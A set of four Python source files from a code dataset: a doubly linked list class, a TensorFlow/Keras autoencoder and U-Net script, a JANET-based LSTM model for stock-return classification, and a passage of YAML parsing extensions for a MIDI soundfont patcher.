+{"seq_id":"58238121","text":"\"\"\"Each ListNode holds a reference to its previous node\nas well as its next node in the List.\"\"\"\nclass ListNode:\n    def __init__(self, value, prev=None, next=None):\n        self.value = value\n        self.prev = prev\n        self.next = next\n
\n    \"\"\"Wrap the given value in a ListNode and insert it\n    after this node. Note that this node could already\n    have a next node it is pointing to.\"\"\"\n    def insert_after(self, value):\n        current_next = self.next\n        self.next = ListNode(value, self, current_next)\n        if current_next:\n            current_next.prev = self.next\n\n    \"\"\"Wrap the given value in a ListNode and insert it\n    before this node. Note that this node could already\n    have a previous node it is pointing to.\"\"\"\n    def insert_before(self, value):\n        current_prev = self.prev\n        self.prev = ListNode(value, current_prev, self)\n        if current_prev:\n            current_prev.next = self.prev\n\n    \"\"\"Rearranges this ListNode's previous and next pointers\n    accordingly, effectively deleting this ListNode.\"\"\"\n    def delete(self):\n        if self.prev:\n            self.prev.next = self.next\n        if self.next:\n            self.next.prev = self.prev\n\n# ==================================================Doubly Linked List========================================================== #\n\n\"\"\"Our doubly-linked list class. It holds references to\nthe list's head and tail nodes.\"\"\"\nclass DoublyLinkedList:\n    def __init__(self, node=None):\n        self.head = node\n        self.tail = node\n        self.length = 1 if node is not None else 0\n\n    def __len__(self):\n        return self.length\n\n    def add_to_head(self, value):\n        if self.head is None and self.tail is None:\n            # empty list: the new node becomes both head and tail\n            new_head = ListNode(value)\n            self.head = new_head\n            self.tail = new_head\n        else:\n            # add new node before current head node\n            self.head.insert_before(value)\n            # change head node to new node\n            self.head = self.head.prev\n        # increment count\n        self.length += 1\n\n    def remove_from_head(self):\n        if self.head == None:\n            return None\n\n        current_head = self.head\n        if self.head.next == None:\n            self.head = None\n            self.tail = None\n        else:\n            new_head = self.head.next\n            self.head.delete()\n            self.head = new_head\n        self.length -= 1\n        return current_head.value\n\n    def add_to_tail(self, value):\n        if self.tail is None:\n            # empty list: the new node becomes both head and tail\n            new_tail = ListNode(value)\n            if self.head is None:\n                self.head = new_tail\n            self.tail = new_tail\n        else:\n            # add new node after current tail node\n            self.tail.insert_after(value)\n            # change tail node to new node\n            self.tail = self.tail.next\n        # increment count\n        self.length += 1\n\n    def remove_from_tail(self):\n        if self.tail == None:\n            return None\n\n        current_tail = self.tail\n        if self.tail.prev == None:\n            self.head = None\n            self.tail = None\n        else:\n            new_tail = self.tail.prev\n            self.tail.delete()\n            self.tail = new_tail\n        self.length -= 1\n        return current_tail.value\n\n    def move_to_front(self, node):\n        if node is self.tail:\n            self.remove_from_tail()\n        else:\n            self.delete(node)\n        # re-insert the node's value at the head (add_to_head expects a value, not a node)\n        self.add_to_head(node.value)\n\n    def move_to_end(self, node):\n        if node is self.head:\n            self.remove_from_head()\n        else:\n            self.delete(node)\n        # re-insert the node's value at the tail (add_to_tail expects a value, not a node)\n        self.add_to_tail(node.value)\n\n    def delete(self, node):\n        if self.length == 1:\n            self.head = None\n            self.tail = None\n            self.length = 0\n            return node.value\n        if node.prev is not None:\n            node.prev.next = node.next\n        else:\n            # node was the head; advance the head pointer\n            self.head = node.next\n        if node.next is not None:\n            node.next.prev = node.prev\n        else:\n            # node was the tail; move the tail pointer back\n            self.tail = node.prev\n        self.length -= 1\n        return node.value\n\n    def get_max(self):\n        if self.head is None:\n            return None\n        current_max = self.head.value\n        current_node = self.head\n        while current_node is not None:\n            if current_node.value > current_max:\n                current_max = current_node.value\n            current_node = current_node.next\n        return current_max\n\n\n\n# # test add to head initial\n# test_list = DoublyLinkedList()\n# test_list.add_to_head(1)\n# print(\"list length: \", test_list.length)\n# # test add to head after head has one item\n# test_list.add_to_head(2)\n# print(\"list length: \", test_list.length)\n\n# print()\n# # test remove from head\n# print(\"REMOVE HEAD\")\n# print(\"removed head: \", test_list.remove_from_head())\n# print(\"new head: \", test_list.head.value)\n# print(\"list length: \", test_list.length)\n\n# print()\n# # test add to tail\n# print(\"ADD TO TAIL\")\n# test_list.add_to_tail(3)\n# print(\"list length: \", test_list.length)\n# print(\"add 3 to tail: \", test_list.tail.value)\n\n# print()\n# # test remove from tail\n# print(\"REMOVE TAIL\")\n# print(\"old tail: \", test_list.tail.value)\n# print(\"removed tail: \", test_list.remove_from_tail())\n# print(\"new tail: \", test_list.tail.value)\n# print(\"list length: \", test_list.length)\n\n# test_list.add_to_tail(2)\n# test_list.add_to_tail(3)\n# test_list.add_to_tail(4)\n# test_list.add_to_tail(5)\n\n# print()\n# print(\"created list of 1 to 5\")\n\n# print(\"test_list\")\n# print(test_list.head.value)\n# print(test_list.head.next.value)\n# print(test_list.head.next.next.value)\n# print(test_list.head.next.next.next.value)\n# print(test_list.head.next.next.next.next.value)\n\n# print()\n# print(\"test_list.delete(3): \", test_list.delete(test_list.head.next.next))\n\n# print()\n# print(test_list.head.value)\n# print(test_list.head.next.value)\n# print(test_list.head.next.next.value)\n# print(test_list.head.next.next.next.value)\n\n# print(\"max: \", test_list.get_max())","sub_path":"doubly_linked_list/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"653234348","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nimport scipy\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\ndef imageReader(image):\n    pass\n\ndef weight_variable(shape):\n    weights = tf.get_variable(\"weights\", shape=shape, initializer=tf.random_normal_initializer())\n    return weights\n\n\ndef biases_variable(shape):\n    biases = tf.get_variable(\"biases\", shape=shape, initializer=tf.constant_initializer())\n    return biases\n\n\ndef conv2d(x, W):\n    output = tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n    return output\n\n\ndef max_pool(x):\n    output = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n    return output\n\n\ndef net(image, reuse=False, name='net'):\n    with tf.variable_scope(name):\n        if reuse:\n            tf.get_variable_scope().reuse_variables()\n        else:\n            assert tf.get_variable_scope().reuse is False\n\n        inputs_ = tf.placeholder(tf.float32, (None, 28, 28, 1), name='inputs')\n        targets_ = tf.placeholder(tf.float32, (None, 28, 28, 1), name='targets')\n\n        ## encode\n        conv1 = tf.layers.conv2d(inputs_, 16, (3, 3), padding='same', activation=tf.nn.relu)\n        # current shape: 28x28x16\n        maxpool1 = tf.layers.max_pooling2d(conv1, (2, 2), (2, 2), padding='same')\n        # current shape: 14x14x16\n        conv2 = tf.layers.conv2d(maxpool1, 8, (3, 3), padding='same', activation=tf.nn.relu)\n        # current shape: 14x14x8\n        maxpool2 = tf.layers.max_pooling2d(conv2, (2, 2), (2, 2), padding='same')\n        # current shape: 7x7x8\n        conv3 = tf.layers.conv2d(maxpool2, 8, (3, 3), padding='same', activation=tf.nn.relu)\n        # current shape: 7x7x8\n        encoded = tf.layers.max_pooling2d(conv3, (2, 2), (2, 2), padding='same')\n        # current shape: 4x4x8\n\n        ## decode\n        upsample1 = tf.image.resize_nearest_neighbor(encoded, (7, 7))\n        # current shape: 7x7x8\n        conv4 = tf.layers.conv2d(upsample1, 8, (3, 3), padding='same', activation=tf.nn.relu)\n        # current shape: 7x7x8\n        upsample2 = tf.image.resize_nearest_neighbor(conv4, (14, 14))\n        # current shape: 14x14x8\n        conv5 = tf.layers.conv2d(upsample2, 8, (3, 3), padding='same', activation=tf.nn.relu)\n        # current shape: 14x14x8\n        upsample3 = tf.image.resize_nearest_neighbor(conv5, (28, 28))\n        # current shape: 28x28x8\n        conv6 = tf.layers.conv2d(upsample3, 16, (3, 3), padding='same', activation=tf.nn.relu)\n        # current shape: 28x28x16\n\n        logits = tf.layers.conv2d(conv6, 1, (3, 3), padding='same', activation=None)\n        # current shape: 28x28x1\n\n        decoded = tf.nn.sigmoid(logits, name='decoded')\n\n        # compute the loss\n        loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=targets_, logits=logits)\n        cost = tf.reduce_mean(loss)\n        # minimize the loss with the Adam optimizer\n        opt = tf.train.AdamOptimizer(0.001).minimize(cost)\n\n        sess = tf.Session()\n        epochs = 100\n        sess.run(tf.global_variables_initializer())\n        for i in range(epochs):\n            for j in range(30):\n                batch = imageReader(image)[j]\n                imgs = batch.reshape((-1, 100, 100, 1))\n                batch_cost = sess.run([cost, opt], feed_dict={inputs_: imgs, targets_: imgs})\n            if i % 10 == 0:\n                print('Epoch: ' + str(i) + '/100...Training loss: ' + str(batch_cost[0]))\n\n\ndef unet(inputs, input_size=(256, 256, 3)):\n    conv1 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(inputs)\n    conv1 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv1)\n    pool1 = MaxPooling2D(pool_size=(2, 2), data_format='channels_last')(conv1)\n    conv2 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(pool1)\n    conv2 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv2)\n    pool2 = MaxPooling2D(pool_size=(2, 2), data_format='channels_last')(conv2)\n    conv3 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(pool2)\n    conv3 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv3)\n    pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n    conv4 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(pool3)\n    conv4 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv4)\n    drop4 = Dropout(0.5)(conv4)\n    pool4 = MaxPooling2D(pool_size=(2, 2), data_format='channels_last')(drop4)\n\n    conv5 = Conv2D(1024, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(pool4)\n    conv5 = Conv2D(1024, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv5)\n    drop5 = Dropout(0.5)(conv5)\n\n    up6 = Conv2D(512, 2, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(\n        UpSampling2D(size=(2, 2), data_format='channels_last')(drop5))\n    # merge6 = concatenate([drop4, up6], axis=3)\n    conv6 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(up6)\n    conv6 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal', 
data_format='channels_last')(conv6)\n\n up7 = Conv2D(256, 2, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(\n UpSampling2D(size=(2, 2), data_format='channels_last')(conv6))\n # merge7 = concatenate([conv3, up7], axis=3)\n conv7 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(up7)\n conv7 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv7)\n\n up8 = Conv2D(128, 2, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(\n UpSampling2D(size=(2, 2), data_format='channels_last')(conv7))\n # merge8 = concatenate([conv2, up8], axis=3)\n conv8 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(up8)\n conv8 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv8)\n\n up9 = Conv2D(64, 2, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(\n UpSampling2D(size=(2, 2), data_format='channels_last')(conv8))\n # merge9 = concatenate([conv1, up9], axis=3)\n conv9 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(up9)\n conv9 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv9)\n conv9 = Conv2D(2, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv9)\n conv10 = Conv2D(1, 1, activation='sigmoid', data_format='channels_last')(conv9)\n\n model = Model(inputs=inputs, outputs=conv10)\n\n model.compile(optimizer=Adam(lr=1e-4), loss='binary_crossentropy', metrics=['accuracy'])\n\n return model","sub_path":"Python code/DL_Test/MyNet/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":7552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159682741","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 24 16:17:21 2019\n\n@author: evrardgarcelon\n\"\"\"\n\nfrom keras.layers import (Dense, Dropout, Embedding, PReLU, SpatialDropout1D,\n concatenate, Flatten, MaxPooling1D, RepeatVector,\n LSTM, Bidirectional, BatchNormalization, Reshape)\nfrom keras.models import Model, Input\nimport keras\n\n\nfrom src.models.nn.model import GeneralLSTM\nfrom src.models.nn.janet import JANET\n\n\nclass NotSoSmallLSTM(GeneralLSTM):\n def __init__(self,\n data,\n eqt_embeddings_size=20,\n lstm_out_dim=150,\n dropout_rate=0.5,\n dropout_spatial_rate=0.5,\n dropout_lstm=0.5,\n dropout_lstm_rec=0.5,\n loss='binary_crossentropy',\n optimizer=None):\n super(NotSoSmallLSTM, self).__init__(\n data,\n eqt_embeddings_size=eqt_embeddings_size,\n lstm_out_dim=lstm_out_dim,\n use_lstm=True,\n dropout_rate=dropout_rate,\n dropout_spatial_rate=dropout_spatial_rate,\n dropout_lstm=dropout_lstm,\n dropout_lstm_rec=dropout_lstm_rec,\n loss=loss,\n optimizer=optimizer)\n\n self.model, self.inputnames = self.create_model()\n\n def create_model(self):\n \n ### Context equity day\n eqt_code_input = Input(shape=[1], name='eqt_code_input')\n eqt_emb = Embedding(\n output_dim=self.eqt_embeddings_size,\n input_dim=self.n_eqt,\n input_length=1,\n name='eqt_embeddings')(eqt_code_input)\n eqt_emb = SpatialDropout1D(self.dropout_spatial_rate)(eqt_emb)\n eqt_emb = 
Reshape((self.eqt_embeddings_size,1))(eqt_emb)\n# eqt_emb = Flatten()(eqt_emb)\n# \n# date_input = Input(shape=[1], name='date_input')\n# date_emb= Embedding(\n# output_dim=self.eqt_embeddings_size,\n# input_dim=1512,\n# input_length=1,\n# name='date_embeddings')(date_input)\n# date_emb = SpatialDropout1D(self.dropout_spatial_rate)(date_emb)\n# date_emb = Reshape((self.eqt_embeddings_size,1))(date_emb)\n\n# date_emb = Flatten()(date_emb)\n \n nb_eqt_traded_input = Input(shape=[1], name='nb_eqt_traded_input')\n nb_eqt_traded_emb = Embedding(\n output_dim=self.eqt_embeddings_size//2,\n input_dim=self.n_eqt,\n input_length=1,\n name='nb_eqt_traded_emb')(nb_eqt_traded_input)\n nb_eqt_traded = Dropout(self.dropout_spatial_rate)(nb_eqt_traded_emb)\n nb_eqt_traded = Flatten()(nb_eqt_traded)\n \n nb_nan_input = Input(shape=[1], name='nb_nan_input')\n nb_nans_data_emb = Embedding( output_dim=self.eqt_embeddings_size//2,\n input_dim=72,\n input_length=1)(nb_nan_input)\n nb_nans_data = Dropout(self.dropout_spatial_rate)(nb_nans_data_emb)\n nb_nans_data = Flatten()(nb_nans_data)\n \n nb_days_eqt_traded_input = Input(shape=[1], name='nb_days_eqt_traded_input')\n nb_days_eqt_traded = Embedding( output_dim=self.eqt_embeddings_size//2,\n input_dim=1512,\n input_length=1)(nb_days_eqt_traded_input)\n nb_days_eqt_traded = Dropout(self.dropout_spatial_rate)(nb_days_eqt_traded)\n nb_days_eqt_traded = Flatten()(nb_days_eqt_traded)\n \n context_eqt_day = concatenate([nb_eqt_traded,nb_nans_data,nb_days_eqt_traded])\n context_eqt_day = Dense(32, activation = 'linear')(context_eqt_day)\n context_eqt_day = PReLU()(context_eqt_day)\n context_eqt_day = Dropout(self.dropout_rate)(context_eqt_day)\n context_eqt_day = BatchNormalization()(context_eqt_day)\n# \n ### Temporal informations\n returns_input = Input(shape=(self.returns_length, 1), name='returns_input')\n \n market_returns_input = Input(shape=(self.returns_length, 1), name='market_returns_input')\n# \n eqt_avg_returns_input = Input(shape=(self.returns_length, 1), name='eqt_avg_returns_input')\n#\n # ewma_input = Input(shape=(self.returns_length, 1), name='ewma_rolling_input')\n# \n# std_input = Input(shape=(self.returns_length, 1), name='var_rolling_input')\n# \n returns_eqt = concatenate([returns_input, eqt_emb], axis = 1)\n \n \n market_returns_features = JANET(\n self.lstm_out_dim//2,\n return_sequences=False,\n dropout=self.dropout_lstm,\n recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n kernel_initializer='random_uniform')(market_returns_input)\n \n eqt_avg_returns_features = JANET(\n self.lstm_out_dim//2,\n return_sequences=False,\n dropout=self.dropout_lstm,\n recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n kernel_initializer='random_uniform')(eqt_avg_returns_input)\n \n returns_features = JANET(\n self.lstm_out_dim,\n return_sequences=False,\n dropout=self.dropout_lstm,\n recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n kernel_initializer='random_uniform')(returns_eqt)\n \n # rolling_features = JANET(\n # self.lstm_out_dim,\n # return_sequences=False,\n # dropout=self.dropout_lstm,\n # recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n # kernel_initializer='random_uniform')(ewma_input) \n # var_returns = JANET(\n # self.lstm_out_dim,\n # return_sequences=False,\n # dropout=self.dropout_lstm,\n # recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n # kernel_initializer='random_uniform')(std_input)\n \n# diff_to_market_features = JANET(\n# self.lstm_out_dim,\n# return_sequences=False,\n# 
dropout=self.dropout_lstm,\n#                recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n#                kernel_initializer='random_uniform')(difference_to_market)\n#\n#        diff_to_eqt_features = JANET(\n#                self.lstm_out_dim,\n#                return_sequences=False,\n#                dropout=self.dropout_lstm,\n#                recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n#                kernel_initializer='random_uniform')(diference_to_eqt)\n\n\n        market_features = concatenate([returns_features,\n                                       eqt_avg_returns_features,\n                                       market_returns_features])\n\n        return_features = Dense(self.lstm_out_dim,activation = 'linear')(returns_features)\n        return_features = PReLU()(return_features)\n        return_features = Dropout(self.dropout_rate)(return_features)\n        return_features = BatchNormalization()(return_features)\n\n        market_features = Dense(self.lstm_out_dim,activation = 'linear')(market_features)\n        market_features = PReLU()(market_features)\n        market_features = Dropout(self.dropout_rate)(market_features)\n        market_features = BatchNormalization()(market_features)\n\n\n        # return_market_features = concatenate([market_features, return_features])\n        # return_market_features = Dense(64,activation = 'linear')(return_market_features)\n        # return_market_features = PReLU()(return_market_features)\n        # return_market_features = Dropout(self.dropout_rate)(return_market_features)\n        # return_market_features = BatchNormalization()(return_market_features)\n\n\n        ### Handmade features input\n        handmade_features_input = Input(shape = (len(self.non_return_cols)-2,),\n                                        name = 'handmade_features')\n        handmade_features = Dense(64, activation = 'linear')(handmade_features_input)\n        handmade_features = PReLU()(handmade_features)\n        handmade_features = Dropout(self.dropout_rate)(handmade_features)\n        handmade_features = BatchNormalization()(handmade_features)\n\n        ### Final concatenation\n        # use the processed handmade features here; otherwise the Dense/PReLU\n        # block just above is dead code and the raw input is fed in twice\n        x = concatenate([context_eqt_day, return_features, market_features, handmade_features])\n\n        x = Dense(64,activation = 'linear')(x)\n\n        x = PReLU()(x)\n\n        x = Dropout(self.dropout_rate)(x)\n\n        x = BatchNormalization()(x)\n\n#        x = Dense(128,activation = 'linear')(x)\n#\n#        x = PReLU()(x)\n#\n#        x = Dropout(self.dropout_rate)(x)\n#\n#        x = BatchNormalization()(x)\n\n        output = Dense(2,activation = 'softmax',name = 'output')(x)\n\n\n        model = Model(\n            inputs=[eqt_code_input,\n                    nb_eqt_traded_input,\n                    nb_nan_input,\n                    nb_days_eqt_traded_input,\n                    returns_input,\n                    market_returns_input,\n                    eqt_avg_returns_input,\n                    handmade_features_input],\n            outputs=[output])\n\n        inputs = [\"eqt_code_input\",\n                  \"nb_eqt_traded\",\n                  \"nb_nans_data\",\n                  \"nb_days_eqt_traded\",\n                  \"returns_input\",\n                  \"market_returns_input\",\n                  \"eqt_avg_returns\",\n                  \"handmade_features_input\"\n                  ]\n        return model, inputs\n\n\nif __name__ == '__main__':\n    from src.tools.experiment import Experiment\n    from src.tools.dataloader import Data\n    from src.tools.utils import plot_training\n\n    KFOLDS = 0\n    EPOCHS = 200\n\n    exp = Experiment(modelname=\"not_small_janet\")\n    data = Data(\n        small=False, verbose=True, ewma=False, aggregate=False)\n\n    exp.addconfig(\"data\", data.config)\n\n    model = NotSoSmallLSTM(data)\n    exp.addconfig(\"model\", model.config)\n    from keras.utils import plot_model\n    plot_model(model.model, to_file=exp.pnggraph, show_shapes=True)\n\n    model.model.summary()\n    # Fit the model\n    histories = model.compile_fit(\n        checkpointname=exp.modelname,\n        epochs=EPOCHS,\n        plateau_patience=5,\n        stop_patience=15,\n        verbose=1,\n        batch_size=8192,\n        best = True,\n    )\n\n    exp.addconfig(\"learning\", model.learning_config)\n
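    # The data/model/learning sections registered via addconfig() above are assumed\n    # to be exactly what saveconfig() persists below; saving them before the plotting\n    # and submission steps means a failure there cannot lose the run's hyperparameters.\n    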
exp.saveconfig(verbose=True)\n\n for el, history in enumerate(histories):\n plot_training(\n history,\n show=False,\n losspath=exp._pngloss(el + 1),\n accpath=exp._pngacc(el + 1))\n\n model.create_submission(\n exp.modelname,\n bincsv=exp.allpath(\"predictions_bin.csv\"),\n probacsv=exp.allpath(\"predictions_proba.csv\"))\n \n","sub_path":"src/models/nn/NotSoSmallLSTM.py","file_name":"NotSoSmallLSTM.py","file_ext":"py","file_size_in_byte":10755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"290756373","text":"\"\"\"\nDescription: yaml extensions for fluidpatcher\n\"\"\"\nimport re, oyaml\n\nnn = '[A-G]?[b#]?\\d*[.]?\\d+' # parameter number or scientific note name \nsfp = re.compile('^(.+\\.sf2):(\\d+):(\\d+)$', flags=re.I)\nmsg = re.compile(f'^(note|cc|prog|pbend|cpress|kpress|noteoff):(\\d+):({nn}):?(\\d+)?$')\nsyx = re.compile('^sysex:(.*?):(.+)$')\nrte = re.compile(f'^({nn})-({nn})\\*(-?[\\d\\.]+)([+-]{nn})$')\nfts = re.compile(f'^({nn})?-?({nn})?=?(-?{nn})?-?(-?{nn})?$')\nft1 = re.compile(f'^({nn})-({nn})=?(-?{nn})?-?(-?{nn})?$')\nft2 = re.compile(f'^({nn})=(-?{nn})?-?(-?{nn})?$')\nft3 = re.compile(f'^=(-?{nn})-?(-?{nn})?$')\n\ndef sift(s):\n try:\n s = float(s)\n except (ValueError, TypeError):\n return s\n else:\n if s.is_integer():\n s = int(s)\n return s\n\ndef scinote_to_val(n):\n if not isinstance(n, str):\n return n\n sci = re.findall('([+-]?)([A-G])([b#]?)(-?[0-9])', n)[0]\n sign = -1 if sci[0] == '-' else 1\n note = 'C D EF G A B'.find(sci[1])\n acc = ['b', '', '#'].index(sci[2]) - 1\n octave = int(sci[3])\n return sign * ((octave + 1) * 12 + note + acc)\n\ndef totups(x):\n if isinstance(x, RouterSpec):\n return [(x.min, x.max, x.mul, x.add)]\n elif isinstance(x, list):\n return [(val, val, 1.0, 0) for val in x]\n elif isinstance(x, int):\n return [(x, x, 1.0, 0)]\n elif isinstance(x, str):\n return [(scinote_to_val(x), scinote_to_val(x), 1.0, 0)]\n else: return [None]\n\ndef tochantups(x):\n if isinstance(x, FromToSpec):\n return [(x.min - 1, x.max - 1, 0.0, chto)\n for chto in range(x.tomin - 1, x.tomax)]\n elif isinstance(x, RouterSpec):\n return [(x.min - 1, x.max - 1, x.mul, x.mul + x.add - 1)]\n elif isinstance(x, list):\n return [(ch - 1, ch - 1, 1.0, 0) for ch in x]\n elif isinstance(x, int):\n return [(x- 1, x - 1, 1.0, 0)]\n else: return [None]\n\ndef tochanset(x):\n if isinstance(x, RouterSpec):\n return set(range(x.min - 1, x.max))\n elif isinstance(x, list):\n return set([ch - 1 for ch in x])\n elif isinstance(x, int):\n return {x - 1}\n else: return set()\n\ndef iterdata(x):\n if isinstance(x, (list, dict)):\n for item in x if isinstance(x, list) else x.values():\n if item is None: return None\n elif isinstance(item, (list, dict)):\n if iterdata(item) is None: return None\n return x\n\ndef parse(text):\n return iterdata(oyaml.safe_load(text))\n\ndef render(data):\n return oyaml.safe_dump(data)\n\n\nclass SFPreset(oyaml.YAMLObject):\n\n yaml_tag = '!sfpreset'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n\n def __init__(self, sf, bank, prog):\n self.sf = sf\n self.bank = bank\n self.prog = prog\n \n def __repr__(self):\n return f\"{self.__class__.__name__}({self.sf}, {self.bank}, {self.prog})\"\n\n def __str__(self):\n return f\"{self.sf}:{self.bank:03d}:{self.prog:03d}\"\n\n @classmethod\n def from_yaml(cls, loader, node):\n sf, bank, prog = sfp.search(loader.construct_scalar(node)).groups()\n bank = int(bank)\n prog = int(prog)\n return cls(sf, bank, prog)\n\n @staticmethod\n def 
to_yaml(dumper, data):\n return dumper.represent_scalar('!sfpreset', str(data))\n\n\nclass MidiMsg(oyaml.YAMLObject):\n\n yaml_tag = '!midimsg'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n\n def __init__(self, type, chan, par1, par2=None, yaml=''):\n self.type = type\n self.chan = chan - 1\n self.par1 = scinote_to_val(par1)\n self.par2 = par2\n self.argstr = ', '.join(map(str, [type, chan, par1, par2]))\n self.yaml = yaml\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.argstr})\"\n\n def __str__(self):\n return self.yaml\n\n def __iter__(self):\n return iter([self.type, self.chan, self.par1, self.par2])\n\n @classmethod\n def from_yaml(cls, loader, node):\n m = msg.search(loader.construct_scalar(node))\n type, chan, par1, par2 = map(sift, m.groups())\n return cls(type, chan, par1, par2, m[0])\n\n @staticmethod\n def to_yaml(dumper, data):\n return dumper.represent_scalar('!midimsg', str(data))\n\n\nclass SysexMsg(MidiMsg):\n\n yaml_tag = '!syxmsg'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n\n def __init__(self, dest, data=[], file='', yaml=''):\n self.dest = dest\n self.data = data\n self.file = file\n self.argstr = ', '.join(map(str, [dest, data, file, yaml]))\n self.yaml = yaml\n\n def __iter__(self):\n return iter(self.data)\n\n @classmethod\n def from_yaml(cls, loader, node):\n s = syx.search(loader.construct_scalar(node))\n if ':' in s[2]:\n try:\n data = list(map(int, s[2].split(':')))\n except ValueError:\n data = list(map(lambda x: int(x, 16), s[2].split(':')))\n finally: return cls(s[1], data=[data], yaml=s[0])\n else: return cls(s[1], file=s[2], yaml=s[0])\n\n @staticmethod\n def to_yaml(dumper, data):\n return dumper.represent_scalar('!syxmsg', str(data))\n\n\nclass RouterSpec(oyaml.YAMLObject):\n\n yaml_tag = '!rspec'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n \n def __init__(self, min, max, mul, add, yaml=''):\n self.min = scinote_to_val(min)\n self.max = scinote_to_val(max)\n self.mul = scinote_to_val(mul)\n self.add = scinote_to_val(add)\n self.argstr = ', '.join(map(str, [min, max, mul, add]))\n self.yaml = yaml\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.argstr})\"\n\n def __str__(self):\n return self.yaml\n\n @classmethod\n def from_yaml(cls, loader, node):\n spec = rte.search(loader.construct_scalar(node))\n min, max, mul, add = map(sift, spec.groups())\n return cls(min, max, mul, add, spec[0])\n\n @staticmethod\n def to_yaml(dumper, data):\n return dumper.represent_scalar('!rspec', str(data))\n\n\nclass FromToSpec(RouterSpec):\n\n yaml_tag = '!ftspec'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n \n def __init__(self, min, max, tomin, tomax, yaml=''):\n if min == None: min, max = 0, 127\n self.min = scinote_to_val(min)\n self.max = scinote_to_val(max) if max != None else self.min\n self.tomin = scinote_to_val(tomin) if tomin != None else self.min\n if tomax != None: self.tomax = scinote_to_val(tomax)\n elif tomin != None: self.tomax = self.tomin\n else: self.tomax = self.max\n if self.min == self.max:\n self.mul = 1\n else:\n self.mul = (self.tomax - self.tomin) / (self.max - self.min)\n self.add = self.tomin - self.min * self.mul\n self.argstr = ', '.join(map(str, [min, max, tomin, tomax]))\n self.yaml = yaml\n\n @classmethod\n def from_yaml(cls, loader, node):\n spec = fts.search(loader.construct_scalar(node))\n min, max, tomin, tomax = map(sift, spec.groups())\n return cls(min, max, tomin, tomax, spec[0])\n \n @staticmethod\n def 
to_yaml(dumper, data):\n return dumper.represent_scalar('!ftspec', str(data))\n\n\nclass RouterRule(oyaml.YAMLObject):\n\n yaml_tag = '!rrule'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n \n def __init__(self, type='', chan=None, par1=None, par2=None, **apars):\n self.type = type\n self.chan = tochantups(chan)\n self.par1 = totups(par1)\n self.par2 = totups(par2)[0]\n self.apars = apars\n rule = dict(type=type)\n for par, val in [('chan', chan), ('par1', par1), ('par2', par2)]:\n if val != None: rule[par] = val\n self.rule = {**rule, **apars}\n self.kwstr = ', '.join([f\"{k}={v}\" for k, v in self.rule.items()])\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.kwstr})\"\n\n def __str__(self):\n return str(self.rule)\n\n def __iter__(self):\n return iter(self.rule.items())\n\n def add(self, addfunc):\n for chan in self.chan:\n for par1 in self.par1:\n addfunc(self.type, chan, par1, self.par2, **self.apars)\n\n @classmethod\n def from_yaml(cls, loader, node):\n return cls(**loader.construct_mapping(node))\n\n 